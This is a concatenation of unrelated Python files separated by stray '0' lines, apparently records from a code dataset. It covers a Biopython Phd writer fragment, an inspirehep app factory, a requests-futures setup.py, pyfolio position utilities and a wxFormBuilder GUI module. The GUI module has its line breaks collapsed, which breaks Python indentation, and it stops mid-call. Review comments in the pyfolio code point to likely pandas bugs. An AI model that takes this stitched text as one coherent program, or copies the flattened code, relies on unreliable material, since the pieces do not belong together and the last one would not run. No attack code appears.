                # "<start> <end> <float>" — presumably trim coordinates plus
                # a probability/score; TODO confirm against Phd parser.
                if record.annotations.get("trim", None):
                    value = "%s %s %.4f" % record.annotations["trim"]
            elif annot == "trace_peak_area_ratio":
                if record.annotations.get("trace_peak_area_ratio", None):
                    value = "%.4f" % record.annotations[
                        "trace_peak_area_ratio"]
            else:
                value = record.annotations.get(annot, None)
            # Emit the keyword when a value exists; note 0 is a legitimate
            # value, while None / "" are deliberately skipped.
            if value or value == 0:
                self.handle.write("%s: %s\n" % (annot.upper(), value))

        self.handle.write("END_COMMENT\nBEGIN_DNA\n")

        # One line per base: "base quality [peak_location]"
        for i, site in enumerate(record.seq):
            if peak_locations:
                self.handle.write("%s %i %i\n" % (
                    site,
                    round(phred_qualities[i]),
                    peak_locations[i])
                )
            else:
                self.handle.write("%s %i\n" % (
                    site,
                    round(phred_qualities[i]))
                )
        self.handle.write("END_DNA\nEND_SEQUENCE\n")


if __name__ == "__main__":
    from Bio._utils import run_doctest
    run_doctest()
0
# -*- coding: utf-8 -*-

"""inspirehep application factories."""

import os
import sys

from invenio_base.app import create_app_factory
from invenio_base.wsgi import create_wsgi_factory
from invenio_config import create_conf_loader

from . import config

#: Prefix for the environment variables that configure the application.
env_prefix = 'APP'

#: Configuration loader shared by the UI and API application factories.
config_loader = create_conf_loader(config=config, env_prefix=env_prefix)

# Fallback locations used when the corresponding environment variable is
# unset or empty (hence ``or`` rather than a plain default argument).
_default_instance_path = os.path.join(sys.prefix, 'var', 'inspirehep-instance')

instance_path = os.getenv(env_prefix + '_INSTANCE_PATH') or \
    _default_instance_path
"""Instance path for Invenio.

Defaults to ``<env_prefix>_INSTANCE_PATH`` or if environment variable
is not set ``<sys.prefix>/var/<app_name>-instance``.
"""

static_folder = os.getenv(env_prefix + '_STATIC_FOLDER') or \
    os.path.join(instance_path, 'static')
"""Static folder path.

Defaults to ``<env_prefix>_STATIC_FOLDER`` or if environment variable
is not set ``<sys.prefix>/var/<app_name>-instance/static``.
"""

#: REST API application factory (blueprints mounted under ``/api``).
create_api = create_app_factory(
    'inspirehep',
    config_loader=config_loader,
    blueprint_entry_points=['invenio_base.api_blueprints'],
    extension_entry_points=['invenio_base.api_apps'],
    instance_path=instance_path,
)

#: UI application factory; the API app is mounted as a WSGI sub-application.
create_app = create_app_factory(
    'inspirehep',
    config_loader=config_loader,
    blueprint_entry_points=['invenio_base.blueprints'],
    extension_entry_points=['invenio_base.apps'],
    wsgi_factory=create_wsgi_factory({'/api': create_api}),
    instance_path=instance_path,
    static_folder=static_folder,
)
0
#!/usr/bin/env python
"""Packaging script for requests-futures."""

import os
import sys

import requests_futures

try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

# Shortcut: ``python setup.py publish`` builds an sdist and uploads it.
if sys.argv[-1] == 'publish':
    os.system('python setup.py sdist upload')
    sys.exit()

packages = [
    'requests_futures',
]

requires = [
    'requests>=1.2.0'
]

# concurrent.futures is in the standard library from Python 3.2 onwards;
# older interpreters need the "futures" backport.
if sys.version_info < (3, 2):
    requires.append('futures>=2.1.3')

# Read the long description with a context manager so the file handle is
# closed deterministically (open(...).read() inline would leak it).
with open('README.rst') as readme_file:
    long_description = readme_file.read()

setup(
    name='requests-futures',
    version=requests_futures.__version__,
    description='Asynchronous Python HTTP for Humans.',
    long_description=long_description,
    author='Ross McFarland',
    author_email='rwmcfa1@neces.com',
    packages=packages,
    package_dir={'requests_futures': 'requests_futures'},
    package_data={'requests_futures': ['LICENSE', 'README.rst']},
    include_package_data=True,
    install_requires=requires,
    license='Apache License v2',
    url='https://github.com/ross/requests-futures',
    zip_safe=False,
    classifiers=(
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Natural Language :: English',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.1',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
    ),
)
0
#
# Copyright 2015 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division

import pandas as pd


def get_portfolio_alloc(positions):
    """
    Determines a portfolio's allocations.

    Each position value is divided by the row-wise sum of absolute
    position values, so allocations are fractions of gross exposure.

    Parameters
    ----------
    positions : pd.DataFrame
        Contains position values or amounts.

    Returns
    -------
    positions_alloc : pd.DataFrame
        Positions and their allocations.
    """
    # NOTE(review): axis='rows' is the legacy spelling of axis='index' —
    # confirm it is accepted by the pandas version this project pins.
    return positions.divide(
        positions.abs().sum(axis='columns'),
        axis='rows'
    )


def get_long_short_pos(positions, gross_lev=1.):
    """
    Determines the long amount, short amount, and cash of a portfolio.

    Parameters
    ----------
    positions : pd.DataFrame
        The positions that the strategy takes over time.
    gross_lev : float, optional
        The porfolio's gross leverage (default 1).

    Returns
    -------
    df_long_short : pd.DataFrame
        Net long, short, and cash positions.
    """
    positions_wo_cash = positions.drop('cash', axis='columns')
    # Sum of positive position values per date...
    df_long = positions_wo_cash.apply(lambda x: x[x > 0].sum(), axis='columns')
    # ...and (sign-flipped) sum of negative position values per date.
    df_short = - \
        positions_wo_cash.apply(lambda x: x[x < 0].sum(), axis='columns')
    # Shorting positions adds to cash
    df_cash = positions.cash.abs() - df_short
    df_long_short = pd.DataFrame({'long': df_long,
                                  'short': df_short,
                                  'cash': df_cash})
    # Renormalize so long + short + cash sums to 1 per date.
    # NOTE(review): dividing a DataFrame by a row-sum Series aligns on
    # column labels, not on rows — this looks like it needs
    # .divide(..., axis='index'); confirm against the pinned pandas.
    df_long_short /= df_long_short.sum(axis='columns')

    # Renormalize to leverage
    df_long_short *= gross_lev

    return df_long_short


def get_top_long_short_abs(positions, top=10):
    """
    Finds the top long, short, and absolute positions.

    "Top" is measured on each column's extreme value over time (max for
    longs, min for shorts, absolute max for absolute positions).

    Parameters
    ----------
    positions : pd.DataFrame
        The positions that the strategy takes over time.
    top : int, optional
        How many of each to find (default 10).

    Returns
    -------
    df_top_long : pd.DataFrame
        Top long positions.
    df_top_short : pd.DataFrame
        Top short positions.
    df_top_abs : pd.DataFrame
        Top absolute positions.
    """
    # Cash is not a position for ranking purposes.
    positions = positions.drop('cash', axis='columns')
    df_max = positions.max()
    df_min = positions.min()
    df_abs_max = positions.abs().max()
    # Only columns that were ever long (resp. short) qualify.
    df_top_long = df_max[df_max > 0].nlargest(top)
    df_top_short = df_min[df_min < 0].nsmallest(top)
    df_top_abs = df_abs_max.nlargest(top)
    return df_top_long, df_top_short, df_top_abs


def extract_pos(positions, cash):
    """Extract position values from backtest object as returned by
    get_backtest() on the Quantopian research platform.

    Parameters
    ----------
    positions : pd.DataFrame
        timeseries containing one row per symbol (and potentially
        duplicate datetime indices) and columns for amount and
        last_sale_price.
    cash : pd.Series
        timeseries containing cash in the portfolio.

    Returns
    -------
    pd.DataFrame
        Daily net position values.
         - See full explanation in tears.create_full_tear_sheet.
    """
    # Work on a copy so the caller's DataFrame is not mutated.
    positions = positions.copy()
    positions['values'] = positions.amount * positions.last_sale_price
    cash.name = 'cash'

    # Pivot the long-format (date, sid) rows into one column per sid.
    values = positions.reset_index().pivot_table(index='index',
                                                 columns='sid',
                                                 values='values')

    values = values.join(cash)

    return values


def get_turnover(transactions, positions, period=None):
    """
    Portfolio Turnover Rate:

    Average value of purchases and sales divided
    by the average portfolio value for the period.

    If no period is provided the period is one time step.

    Parameters
    ----------
    transactions : pd.DataFrame
        Contains transactions data.
        - See full explanation in tears.create_full_tear_sheet
    positions : pd.DataFrame
        Contains daily position values including cash
        - See full explanation in tears.create_full_tear_sheet
    period : str, optional
        Takes the same arguments as df.resample.

    Returns
    -------
    turnover_rate : pd.Series
        timeseries of portfolio turnover rates.
    """
    traded_value = transactions.txn_volume
    portfolio_value = positions.sum(axis=1)
    if period is not None:
        # NOTE(review): resample(..., how=...) is the legacy pandas API
        # (removed in modern pandas in favour of .resample(period).sum());
        # fine for the pandas version this module was written against.
        traded_value = traded_value.resample(period, how='sum')
        portfolio_value = portfolio_value.resample(period, how='mean')
    # traded_value contains the summed value from buys and sells;
    # this is divided by 2.0 to get the average of the two.
    turnover = traded_value / 2.0
    turnover_rate = turnover / portfolio_value
    return turnover_rate
0
# -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Oct 14 2017) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc import wx.html2 from beatle.lib import wxx from beatle import localpath import wx.richtext import wx.aui import wx.animate # special import for beatle development from beatle.lib.handlers import Identifiers ID_NEW_WORKSPACE = Identifiers.register('ID_NEW_WORKSPACE') ID_NEW_PROJECT = Identifiers.register('ID_NEW_PROJECT') ID_OPEN_WORKSPACE = Identifiers.register('ID_OPEN_WORKSPACE') ID_OPEN_PROJECT = Identifiers.register('ID_OPEN_PROJECT') ID_CLOSE_WORKSPACE = Identifiers.register('ID_CLOSE_WORKSPACE') ID_CLOSE_PROJECT = Identifiers.register('ID_CLOSE_PROJECT') ID_IMPORT_PROJECT = Identifiers.register('ID_IMPORT_PROJECT') ID_SAVE_WORKSPACE = Identifiers.register('ID_SAVE_WORKSPACE') ID_SAVE_PROJECT = Identifiers.register('ID_SAVE_PROJECT') ID_QUIT = Identifiers.register('ID_QUIT') ID_UNDO = Identifiers.register('ID_UNDO') ID_REDO = Identifiers.register('ID_REDO') ID_COPY = Identifiers.register('ID_COPY') ID_CUT = Identifiers.register('ID_CUT') ID_PASTE = Identifiers.register('ID_PASTE') ID_DELETE = Identifiers.register('ID_DELETE') ID_EDIT_OPEN = Identifiers.register('ID_EDIT_OPEN') ID_EDIT_CONTEXT = Identifiers.register('ID_EDIT_CONTEXT') ID_EDIT_USER_SECTIONS = Identifiers.register('ID_EDIT_USER_SECTIONS') ID_EDIT_PROPERTIES = Identifiers.register('ID_EDIT_PROPERTIES') ID_PREFERENCES = Identifiers.register('ID_PREFERENCES') ########################################################################### ## Class FontPreferences ########################################################################### class FontPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = 
wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer78 = wx.FlexGridSizer( 2, 2, 0, 0 ) fgSizer78.AddGrowableCol( 1 ) fgSizer78.SetFlexibleDirection( wx.BOTH ) fgSizer78.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText44 = wx.StaticText( self, wx.ID_ANY, u"Defaul text font:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText44.Wrap( -1 ) fgSizer78.Add( self.m_staticText44, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_fontPicker = wx.FontPickerCtrl( self, wx.ID_ANY, wx.NullFont, wx.DefaultPosition, wx.DefaultSize, wx.FNTP_DEFAULT_STYLE ) self.m_fontPicker.SetMaxPointSize( 100 ) fgSizer78.Add( self.m_fontPicker, 0, wx.ALL|wx.EXPAND, 5 ) self.SetSizer( fgSizer78 ) self.Layout() def __del__( self ): pass ########################################################################### ## Class NavigatorPane ########################################################################### class NavigatorPane ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL|wx.WANTS_CHARS ) self.SetExtraStyle( wx.WS_EX_BLOCK_EVENTS ) self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNSHADOW ) ) self.SetBackgroundColour( wx.Colour( 0, 3, 135 ) ) fgSizer193 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer193.AddGrowableCol( 0 ) fgSizer193.AddGrowableRow( 1 ) fgSizer193.SetFlexibleDirection( wx.BOTH ) fgSizer193.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_url = wx.TextCtrl( self, wx.ID_ANY, u"aa", wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER|wx.SIMPLE_BORDER ) self.m_url.SetFont( wx.Font( wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_SLANT, wx.FONTWEIGHT_NORMAL, False, "Arial" ) ) self.m_url.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_3DDKSHADOW ) ) self.m_url.SetBackgroundColour( wx.SystemSettings.GetColour( 
wx.SYS_COLOUR_BACKGROUND ) ) self.m_url.Hide() fgSizer193.Add( self.m_url, 0, wx.EXPAND, 5 ) self.m_page = wx.html2.WebView.New(self) fgSizer193.Add( self.m_page, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer193 ) self.Layout() # Connect Events self.m_url.Bind( wx.EVT_TEXT_ENTER, self.OnEnterUrl ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnEnterUrl( self, event ): event.Skip() ########################################################################### ## Class TasksPane ########################################################################### class TasksPane ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 731,300 ), style = wx.TAB_TRAVERSAL ) fgSizer91 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer91.AddGrowableCol( 1 ) fgSizer91.AddGrowableRow( 0 ) fgSizer91.SetFlexibleDirection( wx.BOTH ) fgSizer91.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_listCtrl2 = wx.ListCtrl( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT ) fgSizer91.Add( self.m_listCtrl2, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer92 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer92.AddGrowableCol( 0 ) fgSizer92.AddGrowableRow( 1 ) fgSizer92.SetFlexibleDirection( wx.BOTH ) fgSizer92.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer93 = wx.FlexGridSizer( 2, 4, 0, 0 ) fgSizer93.AddGrowableCol( 1 ) fgSizer93.AddGrowableCol( 3 ) fgSizer93.SetFlexibleDirection( wx.BOTH ) fgSizer93.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText50 = wx.StaticText( self, wx.ID_ANY, u"task", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText50.Wrap( -1 ) fgSizer93.Add( self.m_staticText50, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl34 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer93.Add( self.m_textCtrl34, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText51 = wx.StaticText( 
self, wx.ID_ANY, u"status", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText51.Wrap( -1 ) fgSizer93.Add( self.m_staticText51, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice20Choices = [ u"pending", u"doing", u"done", wx.EmptyString, wx.EmptyString, wx.EmptyString ] self.m_choice20 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice20Choices, 0 ) self.m_choice20.SetSelection( 0 ) fgSizer93.Add( self.m_choice20, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText52 = wx.StaticText( self, wx.ID_ANY, u"priority", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText52.Wrap( -1 ) fgSizer93.Add( self.m_staticText52, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice21Choices = [ u"High", u"Normal", u"Low" ] self.m_choice21 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice21Choices, 0 ) self.m_choice21.SetSelection( 1 ) fgSizer93.Add( self.m_choice21, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText53 = wx.StaticText( self, wx.ID_ANY, u"type", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText53.Wrap( -1 ) fgSizer93.Add( self.m_staticText53, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice22Choices = [ u"BUG", u"CHANGE", u"IMPROVE" ] self.m_choice22 = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice22Choices, 0 ) self.m_choice22.SetSelection( 1 ) fgSizer93.Add( self.m_choice22, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer92.Add( fgSizer93, 1, wx.EXPAND, 5 ) sbSizer22 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"Comments" ), wx.VERTICAL ) self.m_richText16 = wx.richtext.RichTextCtrl( sbSizer22.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer22.Add( self.m_richText16, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer92.Add( sbSizer22, 1, wx.EXPAND|wx.BOTTOM|wx.RIGHT|wx.LEFT, 5 ) fgSizer91.Add( fgSizer92, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer91 ) self.Layout() def __del__( self ): 
pass ########################################################################### ## Class BuildBinaries ########################################################################### class BuildBinaries ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer102 = wx.FlexGridSizer( 5, 3, 0, 0 ) fgSizer102.AddGrowableCol( 1 ) fgSizer102.SetFlexibleDirection( wx.BOTH ) fgSizer102.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText65 = wx.StaticText( self, wx.ID_ANY, u"C++ compiler:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText65.Wrap( -1 ) fgSizer102.Add( self.m_staticText65, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl41 = wx.TextCtrl( self, wx.ID_ANY, u"g++", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl41, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.EXPAND, 5 ) self.m_bpButton3 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton3, 0, wx.ALL, 5 ) self.m_staticText66 = wx.StaticText( self, wx.ID_ANY, u"shared libraries linker:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText66.Wrap( -1 ) fgSizer102.Add( self.m_staticText66, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl411 = wx.TextCtrl( self, wx.ID_ANY, u"g++", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl411, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton31 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton31, 0, wx.ALL, 5 ) self.m_staticText67 = wx.StaticText( self, wx.ID_ANY, u"static libraries linker:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText67.Wrap( -1 ) fgSizer102.Add( 
self.m_staticText67, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl4111 = wx.TextCtrl( self, wx.ID_ANY, u"ar", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl4111, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton311 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton311, 0, wx.ALL, 5 ) self.m_staticText651 = wx.StaticText( self, wx.ID_ANY, u"make:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText651.Wrap( -1 ) fgSizer102.Add( self.m_staticText651, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl41111 = wx.TextCtrl( self, wx.ID_ANY, u"make", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer102.Add( self.m_textCtrl41111, 0, wx.ALL|wx.EXPAND, 5 ) self.m_bpButton3111 = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW ) fgSizer102.Add( self.m_bpButton3111, 0, wx.ALL, 5 ) self.SetSizer( fgSizer102 ) self.Layout() def __del__( self ): pass ########################################################################### ## Class WebPreferences ########################################################################### class WebPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.TAB_TRAVERSAL ) fgSizer61 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer61.AddGrowableCol( 0 ) fgSizer61.AddGrowableRow( 0 ) fgSizer61.AddGrowableRow( 1 ) fgSizer61.SetFlexibleDirection( wx.BOTH ) fgSizer61.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) connection = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"connection" ), wx.VERTICAL ) self.m_radioBtn4 = wx.RadioButton( connection.GetStaticBox(), wx.ID_ANY, u"Automatic network configuration", wx.DefaultPosition, wx.DefaultSize, 0 ) 
connection.Add( self.m_radioBtn4, 0, wx.ALL, 5 ) self.m_radioBtn5 = wx.RadioButton( connection.GetStaticBox(), wx.ID_ANY, u"Manual proxy settings", wx.DefaultPosition, wx.DefaultSize, 0 ) connection.Add( self.m_radioBtn5, 0, wx.ALL, 5 ) fgSizer62 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer62.AddGrowableCol( 1 ) fgSizer62.AddGrowableRow( 2 ) fgSizer62.SetFlexibleDirection( wx.BOTH ) fgSizer62.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer62.AddSpacer( ( 40, 0), 1, wx.EXPAND, 5 ) fgSizer63 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer63.AddGrowableCol( 1 ) fgSizer63.SetFlexibleDirection( wx.BOTH ) fgSizer63.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.st_http_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"http proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_http_proxy.Wrap( -1 ) self.st_http_proxy.Enable( False ) fgSizer63.Add( self.st_http_proxy, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_http_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_http_proxy.Enable( False ) fgSizer63.Add( self.m_http_proxy, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer62.Add( fgSizer63, 1, wx.EXPAND, 5 ) fgSizer62.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.m_checkBox6 = wx.CheckBox( connection.GetStaticBox(), wx.ID_ANY, u"use same proxy for all protocols", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_checkBox6.SetValue(True) self.m_checkBox6.Enable( False ) fgSizer62.Add( self.m_checkBox6, 0, wx.ALL, 5 ) fgSizer62.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) fgSizer631 = wx.FlexGridSizer( 2, 2, 0, 0 ) fgSizer631.AddGrowableCol( 1 ) fgSizer631.SetFlexibleDirection( wx.BOTH ) fgSizer631.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.st_https_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"https proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_https_proxy.Wrap( -1 ) self.st_https_proxy.Enable( False ) fgSizer631.Add( 
self.st_https_proxy, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_https_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_https_proxy.Enable( False ) fgSizer631.Add( self.m_https_proxy, 0, wx.ALL|wx.EXPAND, 5 ) self.st_ftp_proxy = wx.StaticText( connection.GetStaticBox(), wx.ID_ANY, u"ftp proxy:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.st_ftp_proxy.Wrap( -1 ) self.st_ftp_proxy.Enable( False ) fgSizer631.Add( self.st_ftp_proxy, 0, wx.ALL, 5 ) self.m_ftp_proxy = wx.TextCtrl( connection.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.STATIC_BORDER ) self.m_ftp_proxy.Enable( False ) fgSizer631.Add( self.m_ftp_proxy, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer62.Add( fgSizer631, 1, wx.EXPAND, 5 ) connection.Add( fgSizer62, 1, wx.EXPAND, 5 ) fgSizer61.Add( connection, 1, wx.EXPAND, 5 ) self.m_button4 = wx.Button( self, wx.ID_ANY, u"Apply", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_button4.Enable( False ) fgSizer61.Add( self.m_button4, 0, wx.ALL|wx.ALIGN_RIGHT, 5 ) self.SetSizer( fgSizer61 ) self.Layout() # Connect Events self.m_radioBtn4.Bind( wx.EVT_RADIOBUTTON, self.OnAutoNetwork ) self.m_radioBtn5.Bind( wx.EVT_RADIOBUTTON, self.OnManualProxy ) self.m_http_proxy.Bind( wx.EVT_TEXT, self.OnChangeHttpProxy ) self.m_checkBox6.Bind( wx.EVT_CHECKBOX, self.OnSameProxy ) self.m_https_proxy.Bind( wx.EVT_TEXT, self.OnChangeHttpsProxy ) self.m_ftp_proxy.Bind( wx.EVT_TEXT, self.OnChangeFtpProxy ) self.m_button4.Bind( wx.EVT_BUTTON, self.OnApply ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnAutoNetwork( self, event ): event.Skip() def OnManualProxy( self, event ): event.Skip() def OnChangeHttpProxy( self, event ): event.Skip() def OnSameProxy( self, event ): event.Skip() def OnChangeHttpsProxy( self, event ): event.Skip() def OnChangeFtpProxy( self, event ): event.Skip() def OnApply( self, 
event ): event.Skip() ########################################################################### ## Class HelpPreferences ########################################################################### class HelpPreferences ( wx.Panel ): def __init__( self, parent ): wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 616,334 ), style = wx.TAB_TRAVERSAL ) sbSizer14 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u"help items" ), wx.VERTICAL ) fgSizer65 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer65.AddGrowableCol( 0 ) fgSizer65.AddGrowableRow( 0 ) fgSizer65.SetFlexibleDirection( wx.BOTH ) fgSizer65.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_help_items = wx.ListCtrl( sbSizer14.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_AUTOARRANGE|wx.LC_NO_HEADER|wx.LC_REPORT|wx.LC_SINGLE_SEL ) fgSizer65.Add( self.m_help_items, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer66 = wx.FlexGridSizer( 4, 1, 0, 0 ) fgSizer66.AddGrowableCol( 0 ) fgSizer66.AddGrowableRow( 3 ) fgSizer66.SetFlexibleDirection( wx.BOTH ) fgSizer66.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_new_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer66.Add( self.m_new_btn, 0, wx.ALL|wx.EXPAND, 5 ) self.m_edit_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"Edit", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_edit_btn.Enable( False ) fgSizer66.Add( self.m_edit_btn, 0, wx.ALL|wx.EXPAND, 5 ) self.m_del_btn = wx.Button( sbSizer14.GetStaticBox(), wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_del_btn.Enable( False ) fgSizer66.Add( self.m_del_btn, 0, 